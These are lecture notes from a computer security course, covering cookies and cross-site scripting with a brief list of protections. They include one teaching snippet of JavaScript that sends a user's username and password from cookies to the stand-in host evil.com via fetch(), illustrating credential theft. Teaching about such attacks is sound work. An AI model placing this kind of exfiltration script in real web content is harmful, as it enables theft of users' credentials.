CS338 Computer Security
Wednesday, 25 May 2022

+ In defense of a liberal arts background to help you make
    sense of tech in the world
https://yro.slashdot.org/story/22/05/24/218210/bing-contract-prohibits-duckduckgo-from-completely-blocking-microsoft-tracking

+ Questions?

+ Reading/viewing
- More privacy discussion Friday

+ Lab today
- Cookies
- Cross-site scripting (XSS)

=======
- Website can store data on the user's computer via cookies
- "HTTP is stateless"
- How to send user's username/password cookies to somebody else
    - Moriarty puts Javascript like this in a post

            // code to extract user name and password from
            // this user's cookies for FDF
            var url = 'http://evil.com/?user=' + user + '&pw=' + pw;
            fetch(url, {method:'get'})
            ...
            ;
    - M also sets up an API at evil.com to receive this kind of URL
    - Alice logs in to FDF
    - Alice views M's evil post
    - Evil post sends Alice's user name and pw to evil.com

- Protections
    - Browsers can try to detect code inside what should be data
    - Web developers can be careful
        Frameworks have some ways of helping